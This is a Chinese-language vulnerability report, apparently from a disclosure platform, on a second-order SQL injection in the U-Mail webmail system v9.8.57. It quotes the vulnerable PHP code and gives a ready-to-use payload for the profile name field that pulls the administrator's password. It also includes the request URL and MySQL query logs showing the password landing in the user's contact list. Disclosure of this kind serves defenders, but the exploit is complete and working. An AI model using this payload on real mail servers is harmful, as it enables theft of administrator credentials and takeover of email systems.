### 简要描述:
U-Mail邮件系统二次注入漏洞,可直接获取管理员密码
### 详细说明:
版本:最新版v9.8.57
漏洞文件 /client/oab/module/operates.php 代码
```
if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = gss( $_GET['maillist'] );
if ( $maillist_id )
{
$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );
if ( !$member_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $member_all as $member )
{
if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $member['FullName'],//二次注入
"pref_email" => $member['Mailbox'],
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );
if ( !$res )
{
dump_json( array(
"status" => FALSE,
"message" => el( "添加联系人时发生错误,添加失败!", "" )
) );
}
}
}
}
else
{
$user_ids = gss( $_GET['userlist'] );
$user_ids = id_list_filter( $user_ids );//WooYun-2014-72963
if ( !$user_ids )
{
dump_msg( "param_error", el( "参数错误!", "" ) );
}
$where = "t1.UserID IN (".$user_ids.")";
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $user_all as $user )
{
$qq = $msn = "";
if ( strpos( $user['qqmsn'], "@" ) )
{
$msn = $user['qqmsn'];
}
else
{
$qq = $user['qqmsn'];
}
if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $user['FullName'],
"pref_email" => $user['email'],
"pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
"birthday" => $user['birthday'],
"im_qq" => $qq,
"im_msn" => $msn,
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );//二次注入
if ( !$res )
{
dump_json( array(
"status" => FALSE,
"message" => el( "添加联系人时发生错误,添加失败!", "" )
) );
}
}
}
}
dump_json( array( "status" => TRUE, "message" => "" ) );
}
```
漏洞是先引入单引号,引入数据库,在个人资料处,填写如下exp,如图
',`homepage`=(SELECT password from userlist where userid=2)#
[<img src="https://images.seebug.org/upload/201503/031118376f5e9e79933c526fa934ebe3656a4a20.png" alt="t.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031118376f5e9e79933c526fa934ebe3656a4a20.png)
http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test2
[<img src="https://images.seebug.org/upload/201503/031119328af0264050e5249ea678869e6698cbd8.png" alt="t2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031119328af0264050e5249ea678869e6698cbd8.png)
然后执行该漏洞函数,请求为
[<img src="https://images.seebug.org/upload/201503/0311210025bbbba23fdb15b8d87af5175b6e4c2d.png" alt="t3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0311210025bbbba23fdb15b8d87af5175b6e4c2d.png)
查看个人通讯录,找到管理员密码,如图
[<img src="https://images.seebug.org/upload/201503/031121465dc2708c850931464260d9c82b56f9d7.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/031121465dc2708c850931464260d9c82b56f9d7.png)
SQL执行的过程为
```
150227 11:43:30 8724 Connect umail@localhost on
8724 Query SET NAMES 'UTF8'
8724 Init DB umail
8724 Query UPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='13'
8724 Query UPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='13'
8724 Quit
150227 11:46:10 8727 Connect umail@localhost on
8727 Query SET NAMES 'UTF8'
8727 Init DB umail
8727 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
8727 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (13)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
8727 Query SELECT contact_id FROM pab_contact WHERE user_id='13' AND pref_email='test2@fuck.com' LIMIT 1
8727 Query INSERT INTO pab_contact SET `user_id`='13',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='test2@fuck.com',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-02-27 11:46:10'
8727 Quit
```
### 漏洞证明:
如上
京公网安备 11010502034610号
暂无评论